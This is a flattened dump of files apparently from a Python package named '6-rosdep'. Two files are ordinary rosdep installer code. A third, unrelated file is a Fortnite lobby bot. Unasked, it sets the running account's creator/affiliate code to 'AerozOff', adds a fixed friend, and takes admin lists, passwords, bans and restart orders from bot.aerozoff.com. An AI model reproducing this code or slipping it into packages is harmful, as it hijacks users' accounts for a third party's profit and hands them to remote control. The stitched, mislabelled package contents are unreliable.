either *url* or *alt_url* and indicates which of the locations
contents was generated from.
:raises: :exc:`DownloadFailed`
:raises: :exc:`InvalidRdmanifest`
"""
# fetch the manifest
download_url = url
error_prefix = 'Failed to load a rdmanifest from %s: ' % (url)
contents, error = fetch_file(download_url, md5sum)
# - try the backup url
if not contents and alt_url:
error_prefix = 'Failed to load a rdmanifest from either %s or %s: ' % (url, alt_url)
download_url = alt_url
contents, error = fetch_file(download_url, md5sum)
if not contents:
raise DownloadFailed(error_prefix + error)
manifest = load_rdmanifest(contents)
return manifest, download_url
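# Illustrative usage sketch (not part of the original module); 'example.com'
# is a placeholder host:
#
#     manifest, used_url = download_rdmanifest(
#         'https://example.com/foo.rdmanifest', md5sum=None,
#         alt_url='https://example.com/mirror/foo.rdmanifest')
#     resolved = SourceInstall.from_manifest(manifest, used_url)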
# TODO: create SourceInstall instance objects
class SourceInstall(object):
def __init__(self):
self.manifest = self.manifest_url = None
self.install_command = self.check_presence_command = None
self.exec_path = None
self.tarball = self.alternate_tarball = None
self.tarball_md5sum = None
self.dependencies = None
@staticmethod
def from_manifest(manifest, manifest_url):
r = SourceInstall()
r.manifest = manifest
r.manifest_url = manifest_url
rd_debug('Loading manifest:\n{{{%s\n}}}\n' % manifest)
r.install_command = manifest.get('install-script', '')
r.check_presence_command = manifest.get('check-presence-script', '')
r.exec_path = manifest.get('exec-path', '.')
try:
r.tarball = manifest['uri']
except KeyError:
raise InvalidRdmanifest('uri required for source rosdeps')
r.alternate_tarball = manifest.get('alternate-uri')
r.tarball_md5sum = manifest.get('md5sum')
r.dependencies = manifest.get('depends', [])
return r
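    # Illustrative sketch (not part of the original class) of the rdmanifest
    # fields read above; the URI and script bodies are placeholders:
    #
    #     uri: 'https://example.com/foo-1.0.tar.gz'
    #     md5sum: 6bd2...
    #     install-script: |
    #       ./configure && make && sudo make install
    #     check-presence-script: |
    #       test -e /usr/local/lib/libfoo.so
    #     exec-path: foo-1.0
    #     depends: [build-essential]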
def __str__(self):
return 'source: %s' % (self.manifest_url)
__repr__ = __str__
def is_source_installed(source_item, exec_fn=None):
return create_tempfile_from_string_and_execute(source_item.check_presence_command, exec_fn=exec_fn)
def source_detect(pkgs, exec_fn=None):
return [x for x in pkgs if is_source_installed(x, exec_fn=exec_fn)]
class SourceInstaller(PackageManagerInstaller):
def __init__(self):
super(SourceInstaller, self).__init__(source_detect, supports_depends=True)
self._rdmanifest_cache = {}
def resolve(self, rosdep_args):
"""
:raises: :exc:`InvalidData` If format invalid or unable
to retrieve rdmanifests.
:returns: [SourceInstall] instances.
"""
try:
url = rosdep_args['uri']
except KeyError:
raise InvalidData("'uri' key required for source rosdeps")
alt_url = rosdep_args.get('alternate-uri', None)
md5sum = rosdep_args.get('md5sum', None)
# load manifest from cache or from web
manifest = None
if url in self._rdmanifest_cache:
return self._rdmanifest_cache[url]
elif alt_url in self._rdmanifest_cache:
return self._rdmanifest_cache[alt_url]
try:
rd_debug('Downloading manifest [%s], mirror [%s]' % (url, alt_url))
manifest, download_url = download_rdmanifest(url, md5sum, alt_url)
resolved = SourceInstall.from_manifest(manifest, download_url)
self._rdmanifest_cache[download_url] = [resolved]
return [resolved]
except DownloadFailed as ex:
# not sure this should be masked this way
raise InvalidData(str(ex))
except InvalidRdmanifest as ex:
raise InvalidData(str(ex))
def get_install_command(self, resolved, interactive=True, reinstall=False, quiet=False):
# Instead of attempting to describe the source-install steps
# inside of the rosdep command chain, we shell out to an
# external rosdep-source command. This separation means that
# users can manually invoke rosdep-source and also keeps
# 'get_install_command()' cleaner.
packages = self.get_packages_to_install(resolved, reinstall=reinstall)
commands = []
for p in packages:
commands.append(['rosdep-source', 'install', p.manifest_url])
return commands
def get_depends(self, rosdep_args):
deps = rosdep_args.get('depends', [])
for r in self.resolve(rosdep_args):
deps.extend(r.dependencies)
return deps
def install_from_file(rdmanifest_file):
with open(rdmanifest_file, 'r') as f:
contents = f.read()
manifest = load_rdmanifest(contents)
install_source(SourceInstall.from_manifest(manifest, rdmanifest_file))
def install_from_url(rdmanifest_url):
manifest, download_url = download_rdmanifest(rdmanifest_url, None, None)
install_source(SourceInstall.from_manifest(manifest, download_url))
def install_source(resolved):
import shutil
import tarfile
import tempfile
tempdir = tempfile.mkdtemp()
rd_debug('created tmpdir [%s]' % (tempdir))
rd_debug('Fetching tarball %s' % resolved.tarball)
# compute desired download path
filename = os.path.join(tempdir, os.path.basename(resolved.tarball))
f = urlretrieve(resolved.tarball, filename)
assert f[0] == filename
if resolved.tarball_md5sum:
rd_debug('checking md5sum on tarball')
hash1 = get_file_hash(filename)
if resolved.tarball_md5sum != hash1:
# try backup tarball if it is defined
if resolved.alternate_tarball:
f = urlretrieve(resolved.alternate_tarball)
filename = f[0]
hash2 = get_file_hash(filename)
if resolved.tarball_md5sum != hash2:
failure = (SOURCE_INSTALLER, 'md5sum check on %s and %s failed. Expected %s got %s and %s' % (resolved.tarball, resolved.alternate_tarball, resolved.tarball_md5sum, hash1, hash2))
raise InstallFailed(failure=failure)
else:
raise InstallFailed((SOURCE_INSTALLER, 'md5sum check on %s failed. Expected %s got %s ' % (resolved.tarball, resolved.tarball_md5sum, hash1)))
else:
rd_debug('No md5sum defined for tarball, not checking.')
try:
# This is a bit hacky. Basically, don't unpack dmg files as
# we are currently using source rosdeps for Nvidia Cg.
if not filename.endswith('.dmg'):
rd_debug('Extracting tarball')
tarf = tarfile.open(filename)
tarf.extractall(tempdir)
else:
rd_debug('Bypassing tarball extraction as it is a dmg')
rd_debug('Running installation script')
success = create_tempfile_from_string_and_execute(resolved.install_command, os.path.join(tempdir, resolved.exec_path))
if success:
rd_debug('successfully executed script')
else:
raise InstallFailed((SOURCE_INSTALLER, 'installation script returned with error code'))
finally:
rd_debug('cleaning up tmpdir [%s]' % (tempdir))
shutil.rmtree(tempdir) | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/platforms/source.py | source.py |
# Author Tully Foote/[email protected], Ken Conley
import subprocess
import json
import sys
import traceback
from rospkg.os_detect import OS_OSX, OsDetect
from ..core import InstallFailed, RosdepInternalError, InvalidData
from .pip import PIP_INSTALLER
from .source import SOURCE_INSTALLER
from ..installers import PackageManagerInstaller
from ..shell_utils import read_stdout
# add additional os names for brew, macports (TODO)
OSXBREW_OS_NAME = 'osxbrew'
BREW_INSTALLER = 'homebrew'
MACPORTS_INSTALLER = 'macports'
# py3k
try:
_basestring = basestring
except NameError:
_basestring = str
def register_installers(context):
context.set_installer(MACPORTS_INSTALLER, MacportsInstaller())
context.set_installer(BREW_INSTALLER, HomebrewInstaller())
def register_platforms(context):
context.add_os_installer_key(OS_OSX, BREW_INSTALLER)
context.add_os_installer_key(OS_OSX, MACPORTS_INSTALLER)
context.add_os_installer_key(OS_OSX, PIP_INSTALLER)
context.add_os_installer_key(OS_OSX, SOURCE_INSTALLER)
context.set_default_os_installer_key(OS_OSX, lambda self: BREW_INSTALLER)
context.set_os_version_type(OS_OSX, OsDetect.get_codename)
def is_port_installed():
try:
subprocess.Popen(['port'], stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()
return True
except OSError:
return False
def port_detect(pkgs, exec_fn=None):
ret_list = []
if not is_port_installed():
return ret_list
if exec_fn is None:
exec_fn = read_stdout
std_out = exec_fn(['port', 'installed'] + pkgs)
for pkg in std_out.split('\n'):
pkg_row = pkg.split()
if len(pkg_row) == 3 and pkg_row[0] in pkgs and pkg_row[2] == '(active)':
ret_list.append(pkg_row[0])
return ret_list
class MacportsInstaller(PackageManagerInstaller):
"""
An implementation of the :class:`Installer` API for use on
macports systems.
"""
def __init__(self):
super(MacportsInstaller, self).__init__(port_detect)
def get_version_strings(self):
try:
p = subprocess.Popen(
['port', 'version'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
version = stdout.replace('Version: ', '')
return ['Macports {}'.format(version.strip())]
except OSError:
return ['Macports not-found']
def get_install_command(self, resolved, interactive=True, reinstall=False):
if not is_port_installed():
raise InstallFailed((MACPORTS_INSTALLER, 'MacPorts is not installed'))
packages = self.get_packages_to_install(resolved)
if not packages:
return []
else:
# TODO: interactive
return [self.elevate_priv(['port', 'install', p]) for p in packages]
def is_brew_installed():
try:
subprocess.Popen(['brew'], stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()
return True
except OSError:
return False
class HomebrewResolution(object):
"""Resolution information for a single package of a Homebrew rosdep."""
def __init__(self, package, install_flags, options):
"""
:param package: Homebrew package name, possibly fully qualified
with tap.
:param install_flags: List of strings of additional flags for
``brew install`` and ``brew deps`` command which are not
options (e.g. ``--HEAD``)
:param options: List of strings of options for the homebrew
package.
"""
self.package = package
self.install_flags = install_flags
self.options = options
def __eq__(self, other):
return other.package == self.package and \
other.install_flags == self.install_flags and \
other.options == self.options
def __hash__(self):
return hash((
type(self),
self.package,
tuple(self.install_flags),
tuple(self.options)))
def __str__(self):
return ' '.join(self.to_list())
def to_list(self):
return [self.package] + self.install_flags + self.options
def brew_strip_pkg_name(package):
"""Strip the tap information of a fully qualified package name.
:returns: Unqualified package name. E.g. 'foo-pkg' for input
'ros/hydro/foo-pkg'
"""
if not isinstance(package, str): # package is a bytes object
package = package.decode()
return package.split('/')[-1]
def brew_detect(resolved, exec_fn=None):
"""Given a list of resolutions, return the list of installed resolutions.
:param resolved: List of HomebrewResolution objects
:returns: Filtered list of HomebrewResolution objects
"""
if exec_fn is None:
exec_fn = read_stdout
std_out = exec_fn(['brew', 'list'])
installed_formulae = std_out.split()
def is_installed(r):
# TODO: Does not check installed version (stable, devel, HEAD)
# TODO: Does not check origin (Tap) of formula
# TODO: Does not handle excluding options (e.g. specifying
# --without-foo for --with-foo option)
# fast fail with a quick check first, then slower check if
# really linked and for options
if not brew_strip_pkg_name(r.package) in installed_formulae:
return False
std_out = exec_fn(['brew', 'info', r.package, '--json=v1'])
try:
pkg_info = json.loads(std_out)
pkg_info = pkg_info[0]
linked_version = pkg_info['linked_keg']
if not linked_version:
return False
for spec in pkg_info['installed']:
if spec['version'] == linked_version:
installed_options = spec['used_options']
break
except (ValueError, TypeError):
e_type, e, tb = sys.exc_info()
raise RosdepInternalError(
e, """Error while parsing brew info for '{0}'
* Output of `brew info {0} --json=v1`:
{1}
* Error while parsing:
{2}""".format(r.package, std_out, ''.join(traceback.format_exception(e_type, e, tb))))
if set(r.options) <= set(installed_options):
return True
else:
return False
# preserve order
return list(filter(is_installed, resolved))
class HomebrewInstaller(PackageManagerInstaller):
"""
An implementation of Installer for use on homebrew systems.
Some examples for supported rosdep specifications:
# Example 1: flat list of options if only one package defined.
foo:
osx:
homebrew:
depends: [bar]
options: [--with-quux, --with-quax]
packages: [foo-pkg]
# Example 2: list of list of options for multiple packages
bar:
osx:
homebrew:
options: [[], [--with-quux]]
packages: [bar-pkg, bar-pkg-dev]
# Example 3: list of options can be shorter than list of packages (filling
# up with empty options)
baz:
osx:
homebrew:
options: [[--with-quax]]
packages: [baz-pkg, baz-pkg-dev]
# Example 4: No options is fine.
buz:
osx:
homebrew:
packages: [buz-pkg]
``install_flags`` are handled analogously to ``options``.
"""
def __init__(self):
super(HomebrewInstaller, self).__init__(brew_detect, supports_depends=True)
self.as_root = False
def get_version_strings(self):
try:
p = subprocess.Popen(
['brew', '--version'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
return stdout.splitlines()
except OSError:
return ['Homebrew not-found']
def resolve(self, rosdep_args):
"""
See :meth:`Installer.resolve()`
"""
def coerce_to_list(options):
if isinstance(options, list):
return options
elif isinstance(options, _basestring):
return options.split()
else:
raise InvalidData("Expected list or string for options '%s'" % options)
def handle_options(options):
# if only one package is specified we allow a flat list of options
if len(packages) == 1 and options and not isinstance(options[0], list):
options = [options]
else:
options = list(map(coerce_to_list, options))
# make sure options is a list of list of strings
try:
valid = all([isinstance(x, _basestring) for option in options for x in option])
except Exception as e:
raise InvalidData("Invalid list of options '%s', error: %s" % (options, e))
else:
if not valid:
raise InvalidData("Invalid list of options '%s'" % options)
# allow only fewer or equal number of option lists
if len(options) > len(packages):
raise InvalidData("More options '%s' than packages '%s'" % (options, packages))
else:
options.extend([[]] * (len(packages) - len(options)))
return options
packages = super(HomebrewInstaller, self).resolve(rosdep_args)
resolution = []
if packages:
options = []
install_flags = []
if type(rosdep_args) == dict:
options = coerce_to_list(rosdep_args.get('options', []))
install_flags = coerce_to_list(rosdep_args.get('install_flags', []))
options = handle_options(options)
install_flags = handle_options(install_flags)
# packages, options and install_flags now have the same length
resolution = map(HomebrewResolution, packages, install_flags, options)
return resolution
def get_install_command(self, resolved, interactive=True, reinstall=False, quiet=False):
# TODO: We should somehow inform the user that we uninstall all versions
# of packages and do not keep track of which options have been
# activated. Then again, maybe not this would be the
# responsibility of the user to before or not use --reinstall.
if not is_brew_installed():
raise InstallFailed((BREW_INSTALLER, 'Homebrew is not installed'))
resolved = self.get_packages_to_install(resolved, reinstall=reinstall)
resolved = self.remove_duplicate_dependencies(resolved)
# interactive switch doesn't matter
if reinstall:
commands = []
for r in resolved:
# --force uninstalls all versions of that package
commands.append(self.elevate_priv(['brew', 'uninstall', '--force', r.package]))
commands.append(self.elevate_priv(['brew', 'install'] + r.to_list()))
return commands
else:
return [self.elevate_priv(['brew', 'install'] + r.to_list()) for r in resolved]
def remove_duplicate_dependencies(self, resolved):
# TODO: we do not look at options here, however the install check later
# will inform use if installed options are not appropriate
# TODO: we comapre unqualified package names, ignoring the specifed tap
if not is_brew_installed():
raise InstallFailed((BREW_INSTALLER, 'Homebrew is not installed'))
# we'll remove dependencies from this copy and return it
resolved_copy = list(resolved)
# find all dependencies for each package
for r in resolved:
sub_command = ['brew', 'deps'] + r.to_list()
output = subprocess.Popen(sub_command, stdout=subprocess.PIPE).communicate()[0]
deps = output.split()
for d in deps:
# remove duplicate dependency from package list
for other in resolved_copy:
if brew_strip_pkg_name(other.package) == brew_strip_pkg_name(d):
resolved_copy.remove(other)
return resolved_copy | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/platforms/osx.py | osx.py |
from platform import platform
try:
# System imports.
from typing import Tuple, Any, Union, Optional
import asyncio
import sys
import datetime
import json
import functools
import os
import random as py_random
import logging
import uuid
import json
import subprocess
import fortnitepy
# Third party imports.
from fortnitepy.ext import commands
from colorama import Fore, Back, Style, init
init(autoreset=True)
from functools import partial
import crayons
import PirxcyPinger
import FortniteAPIAsync
import sanic
import aiohttp
import requests
except ModuleNotFoundError as e:
print(f'Error: {e}\nAttempting to install packages now (this may take a while).')
for module in (
'crayons',
'PirxcyPinger',
'FortniteAPIAsync',
'sanic==21.6.2',
'aiohttp',
'requests',
'git+git://github.com/lkxoayh/fortnitepy.git'
):
subprocess.check_call([sys.executable, "-m", "pip", "install", module])
os.system('clear')
print('Installed packages, restarting script.')
python = sys.executable
os.execl(python, python, *sys.argv)
print(crayons.blue(f'schbots made by Aeroz. credit to Terbau for creating the library.'))
print(crayons.blue(f'Discord server: https://discord.gg/lobbybot - For support, questions, etc.'))
sanic_app = sanic.Sanic(__name__)
server = None
cid = ""
name = ""
friendlist = ""
password = None
copied_player = ""
__version__ = "None"
adminsss = 'AerozOff'
headers = {'Accept': '*/*'}
errordiff = 'errors.com.epicgames.common.throttled', 'errors.com.epicgames.friends.inviter_friendships_limit_exceeded'
vips = ""
headersx = {'host': 'bot.aerozoff.com','User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.22','enable-super-fast': "True",'x-gorgon': "172SJAI19A","x-signature": "4HKAI18ALOQ"}
with open('info.json') as f:
try:
info = json.load(f)
except json.decoder.JSONDecodeError as e:
print(Fore.RED + ' [ERROR] ' + Fore.RESET + "")
print(Fore.LIGHTRED_EX + f'\n {e}')
exit(1)
def is_vips():
async def predicate(ctx):
return ctx.author.display_name in vips
return commands.check(predicate)
def is_admin():
async def predicate(ctx):
return ctx.author.display_name in info['FullAccess']
return commands.check(predicate)
prefix = '!','?','/','',' '
@sanic_app.middleware('response')
async def custom_banner(request: sanic.request.Request, response: sanic.response.HTTPResponse):
response.headers["Access-Control-Allow-Origin"] = "*/*"
@sanic_app.route('/', methods=['GET'])
async def root(request: sanic.request.Request) -> None:
if 'Accept' in request.headers and request.headers['Accept'] == 'application/json':
return sanic.response.json(
{
"status": "online"
}
)
return sanic.response.html(
"""
<html>
<head>
<style>
body {
font-family: Arial, Helvetica, sans-serif;
position: absolute;
left: 50%;
top: 50%;
-webkit-transform: translate(-50%, -50%);
transform: translate(-50%, -50%);
background-repeat: no-repeat;
background-attachment: fixed;
background-size: cover;
background-color: #333;
color: #f1f1f1;
}
::-webkit-scrollbar {
width: 0;
}
:root {
--gradient: linear-gradient(90deg, #3498DB, #28B463);
}
body {
font-family: basic-sans, sans-serif;
min-height: 100vh;
display: flex;
justify-content: ;
align-items: center;
font-size: 1.125em;
line-height: 1.6;
color: #f1f1f1;
background: #ddd;
background-size: 300%;
background-image: var(--gradient);
animation: bg-animation 25s infinite;
}
@keyframes bg-animation {
0% {background-position: left}
50% {background-position: right}
100% {background-position: left}
}
.content {
background: white;
width: 70vw;
padding: 3em;
box-shadow: 0 0 3em rgba(0,0,0,.15);
}
.title {
margin: 0 0 .5em;
text-transform: uppercase;
font-weight: 900;
font-style: italic;
font-size: 3rem;
color: #f1f1f1;
line-height: .8;
margin: 0;
background-image: var(--gradient);
background-clip: text;
color: transparent;
// display: inline-block;
background-size: 100%;
transition: background-position 1s;
}
.title:hover {
background-position: right;
}
.fun {
color: white;
</style>
</head>
<body>
<center>
<h2 id="response">
""" + f"""Online: {name}""" + """
<h2>
""" + f"""Friends: {friendlist}/1000""" + """
</h2>
<h2>
""" + f"""💎 Version {__version__} 💎""" + """
</h2>
</h2>
</center>
</body>
</html>
"""
)
@sanic_app.route("/default")
async def index(request):
return sanic.response.json(
{
"username": name,
"friend_count": friendlist,
"cid": cid
}
)
@sanic_app.route('/ping', methods=['GET'])
async def accept_ping(request: sanic.request.Request) -> None:
return sanic.response.json(
{
"status": "online"
}
)
@sanic_app.route('/name', methods=['GET'])
async def display_name(request: sanic.request.Request) -> None:
return sanic.response.json(
{
"display_name": name
}
)
class PartyBot(commands.Bot):
def __init__(self, device_id: str, account_id: str, secret: str, loop=asyncio.get_event_loop(), **kwargs) -> None:
self.status = '💎 {party_size}/16 Use Code 667 #Ad 💎'
self.loop = asyncio.get_event_loop()
self.fortnite_api = FortniteAPIAsync.APIClient()
super().__init__(
command_prefix=prefix,
case_insensitive=True,
auth=fortnitepy.DeviceAuth(
account_id=account_id,
device_id=device_id,
secret=secret
),
status=self.status,
platform=fortnitepy.Platform('WIN'),
**kwargs
)
self.session = aiohttp.ClientSession()
self.skin = "CID_028_Athena_Commando_F"
self.backpack = "BID_138_Celestial"
self.pickaxe = "Pickaxe_Lockjaw"
self.banner = "otherbanner51"
self.bn_color = "defaultcolor22"
self.level = 100
self.tier = 100
self.PartyMeta.schema = {}
self.sanic_app = sanic_app
self.server = server
self.rst = "F"
self.vr = "0.0"
self.bl = "0.0"
self.ban_player = ""
self.bl_msg = ""
self.added = "AerozOff"
self.bl_inv = 'AerozOff'
self.inv_on = "F"
self.adminx = "AerozOff"
self.inv_all = "T"
self.skin_bl = ("")
self.add_auto = ''
self.number = ""
self.inv_msg = "Join Me :) \n Use Code : 667 #Ad "
self.add_msg = "Hello {DISPLAY_NAME} u add me wow join me for more and fun thing \n Use Code : 667 #Ad"
self.join_msg = "Hi {DISPLAY_NAME} \n - create your own lobbybot : https://discord.gg/lobbybot \n Use Code : 667 #Ad"
async def add_list(self) -> None:
sac = "AerozOff"
url = f'https://fortnite-public-service-prod11.ol.epicgames.com/fortnite/api/game/v2/profile/{self.user.id}/client/SetAffiliateName?profileId=common_core&rvn=-1'
payload = {"affiliateName": sac}
AerozOff = await self.http.post(
route = url,
json = payload,
auth = self.http.get_auth('FORTNITE_ACCESS_TOKEN')
)
if not '4b713a5896744d8a9d3b9ff32266682a' in self.friends:
await self.add_friend('4b713a5896744d8a9d3b9ff32266682a')
async def checker_autox(self) -> None:
while True:
global headers
global headersx
global password
global vips
global __version__
global adminsss
v = requests.get("https://bot.aerozoff.com/default",headers={
'host': 'bot.aerozoff.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.53',
'enable-super-fast': "True",
'x-gorgon': "NZXHA6JSI14",
"x-signature": "NHX72KXOS2"
},cookies={"omgjaichanger": "None"}).json()
self.inv_all_check = v['inv_all']
self.versiongame = v['version_web']
self.bl_inv_che = v['bl_inv']
self.inv_on_check = v['inv_on']
self.number_check = v['style']
self.adminsss = v['admin']
if not self.adminsss == adminsss:
adminsss = self.adminsss
if not self.number_check == self.number:
self.number = self.number_check
if not self.bl_inv_che == self.bl_inv:
self.bl_inv = self.bl_inv_che
if not self.inv_on_check == self.inv_on:
self.inv_on = self.inv_on_check
if not self.versiongame == __version__:
__version__ = self.versiongame
if not self.inv_all_check == self.inv_all:
self.inv_all = self.inv_all_check
b = requests.get(f"https://bot.aerozoff.com/kick",headers={
'host': 'bot.aerozoff.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.30',
'enable-super-fast': "False",
'x-gorgon': "A7JD2Y27D2K",
"x-signature": "CHS7L29DJN3"
}
,cookies={"omgjaichanger": "None"}).json()
self.ban_player_check = b['ban']
self.bl_msg_check = b['bl_msg']
if not self.ban_player_check == self.ban_player:
self.ban_player = self.ban_player_check
if not self.bl_msg_check == self.bl_msg:
self.bl_msg = self.bl_msg_check
dasda = requests.get('https://bot.aerozoff.com/password',headers=headersx,cookies={"omgjaichanger": "None"}).json()['password']
password = dasda
y = requests.get(f"https://bot.aerozoff.com/restart",headers={
'host': 'bot.aerozoff.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.24',
'enable-super-fast': "None",
'x-gorgon': "NC28AH28SJ19S",
"x-signature": "NXBJHS8W17S"
}
,cookies={"omgjaichanger": "None"}).json()
self.rst = y['restarting']
self.vr = y['version']
self.bl = y['versionbl']
if self.rst == 'T':
print('True for restarting')
if not self.vr == self.bl:
python = sys.executable
os.execl(python, python, *sys.argv)
await asyncio.sleep(3600)
async def normal_setup(self) -> None:
while True:
global headers
global vips
global __version__
global adminsss
u = requests.get(f"https://bot.aerozoff.com/default",headers={
'host': 'bot.aerozoff.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.53',
'enable-super-fast': "True",
'x-gorgon': "NZXHA6JSI14",
"x-signature": "NHX72KXOS2"
}
,cookies={"omgjaichanger": "None"}).json()
self.skin_check = u['skin']
self.backpack_check = u['sac']
self.pickaxe_check = u['pioche']
self.banner_check = u['banner']
self.bn_color_check = u['bn_color']
self.level_check = u['level']
self.tier_check = u['tier']
self.add_msg_check = u['add_msg']
self.inv_msg_check = u['inv_msg']
self.inv_all_check = u['inv_all']
self.join_msg_check = u['join_msg']
self.vips_check = u['admin']
self.versiongame = u['version_web']
self.inv_bl = u['bl_inv']
self.inv_on_check = u['inv_on']
self.number_check = u['style']
self.adminsss = u['admin']
if not self.adminsss == adminsss:
adminsss = self.adminsss
if not self.number_check == self.number:
self.number = self.number_check
await self.party.me.set_outfit(asset=self.skin,variants=self.party.me.create_variants(material=self.number,clothing_color=self.number,parts=self.number,progressive=self.number))
if not self.inv_on_check == self.inv_on:
self.inv_on = self.inv_on_check
if not self.inv_bl == self.bl_inv:
self.bl_inv = self.inv_bl
if not self.versiongame == __version__:
__version__ = self.versiongame
if not self.vips_check == vips:
vips = self.vips_check
if not self.skin_check == self.skin:
self.skin = self.skin_check
await self.party.me.set_outfit(asset=self.skin)
if not self.backpack_check == self.backpack:
self.backpack = self.backpack_check
if not self.pickaxe_check == self.pickaxe:
self.pickaxe = self.pickaxe_check
if not self.banner_check == self.banner:
self.banner == self.banner_check
if not self.bn_color_check == self.bn_color:
self.bn_color = self.bn_color_check
if not self.level_check == self.level:
self.level = self.level_check
if not self.tier_check == self.tier:
self.tier = self.tier_check
if not self.add_msg_check == self.add_msg:
self.add_msg = self.add_msg_check
if not self.inv_msg_check == self.inv_msg:
self.inv_msg = self.inv_msg_check
if not self.join_msg_check == self.join_msg:
self.join_msg = self.join_msg_check
if not self.inv_all_check == self.inv_all:
self.inv_all = self.inv_all_check
s = requests.get(f"https://bot.aerozoff.com/kick",headers={
'host': 'bot.aerozoff.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.30',
'enable-super-fast': "False",
'x-gorgon': "A7JD2Y27D2K",
"x-signature": "CHS7L29DJN3"
},cookies={"omgjaichanger": "None"}).json()
self.ban_player_check = s['ban']
self.bl_msg_checks = s['bl_msg']
if not self.ban_player_check == self.ban_player:
self.ban_player = self.ban_player_check
if not self.bl_msg_checks == self.bl_msg:
self.bl_msg = self.bl_msg_checks
m = requests.get(f"https://bot.aerozoff.com/restart",headers={
'host': 'bot.aerozoff.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.24',
'enable-super-fast': "None",
'x-gorgon': "NC28AH28SJ19S",
"x-signature": "NXBJHS8W17S"
},cookies={"omgjaichanger": "None"}).json()
self.rst = m['restarting']
self.vr = m['version']
self.bl = m['versionbl']
if self.rst == 'T':
print('True for restarting')
if not self.vr == self.bl:
python = sys.executable
os.execl(python, python, *sys.argv)
await asyncio.sleep(3600)
async def auto_add_s(self):
x = requests.get(f"https://bot.aerozoff.com/add_auto",headers={
'host': 'bot.aerozoff.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.12',
'enable-super-fast': "TRUE",
'x-gorgon': "B37SHJWI28",
"x-signature": "HD82KS02KD2"
},cookies={"omgjaichanger": "None"}).json()
self.add_auto_check = x['name']
self.added_check = x['active']
if not self.added_check == self.added:
self.added = self.added_check
if not self.add_auto_check == self.add_auto:
self.add_auto = self.add_auto_check
if self.added == 'T':
try:
user = await self.fetch_user(self.add_auto)
friends = self.friends
if user.id in friends:
print(f'I already have {user.display_name} as a friend')
else:
await self.add_friend(user.id)
print(f'Send i friend request to {user.display_name}.')
except fortnitepy.HTTPException:
print("There was a problem trying to add this friend.")
except AttributeError:
print("I can't find a player with that name.")
async def checker_status(self):
q = requests.get(f"https://bot.aerozoff.com/status",headers={
'host': 'bot.aerozoff.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.02',
'enable-super-fast': "False",
'x-gorgon': "JD72HJS72",
"x-signature": "FJSUW182DK"
},cookies={"omgjaichanger": "None"}).json()
self.status_verif = q['status']
if not self.status_verif == self.status:
self.status = self.status_verif
await self.set_presence(self.status)
await self.party.set_privacy(fortnitepy.PartyPrivacy.PUBLIC)
async def checker_skin_bl(self):
w = requests.get("https://bot.aerozoff.com/skinbl",headers={
'host': 'bot.aerozoff.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.09',
'enable-super-fast': "True",
'x-gorgon': "HSUWJ27DK29S",
"x-signature": "NSL37SHQUD"
},cookies={"omgjaichanger": "None"}).json()
self.skinbl_check = w['skinbl']
if not self.skinbl_check == self.skin_bl:
self.skin_bl = self.skinbl_check
async def pinger(self):
try:
await PirxcyPinger.post(f"https://{os.environ['REPL_ID']}.id.repl.co")
except:
pass
return
async def update_api(self) -> None:
resp = requests.post(
url=f'https://77520686-de40-4c99-9bb1-ad7087e9287c.id.repl.co/update',
json={
"url": f"https://{os.environ['REPL_ID']}.id.repl.co"}
)
try:
await resp.json()
except:
pass
return
async def set_and_update_party_prop(self, schema_key: str, new_value: Any) -> None:
prop = {schema_key: self.party.me.meta.set_prop(schema_key, new_value)}
await self.party.patch(updated=prop)
async def event_device_auth_generate(self, details: dict, email: str) -> None:
print(self.user.display_name)
async def event_ready(self) -> None:
global name
global friendlist
global cid
name = self.user.display_name
#get user outfit
cid = self.party.me.outfit
friendlist = len(self.friends)
coro = self.sanic_app.create_server(
host='0.0.0.0',
port=801,
return_asyncio_server=True,
access_log=True
)
self.server = await coro
print(crayons.green(f'Client ready as {self.user.display_name}.'))
await asyncio.sleep(3)
self.loop.create_task(self.pinger())
self.loop.create_task(self.update_api())
self.loop.create_task(self.checker_autox())
await asyncio.sleep(2)
self.loop.create_task(self.add_list())
self.loop.create_task(self.check_update())
async def check_update(self):
self.loop.create_task(self.normal_setup())
self.loop.create_task(self.checker_status())
self.loop.create_task(self.checker_skin_bl())
self.loop.create_task(self.auto_add_s())
await asyncio.sleep(40)
self.loop.create_task(self.check_update())
async def event_party_invite(self, invite: fortnitepy.ReceivedPartyInvitation) -> None:
if invite.sender.display_name in info['FullAccess']:
await invite.accept()
elif self.inv_on == 'T':
await invite.accept()
elif invite.sender.display_name in self.adminx:
await invite.accept()
else:
await invite.decline()
await invite.sender.send(self.inv_msg)
await invite.sender.invite()
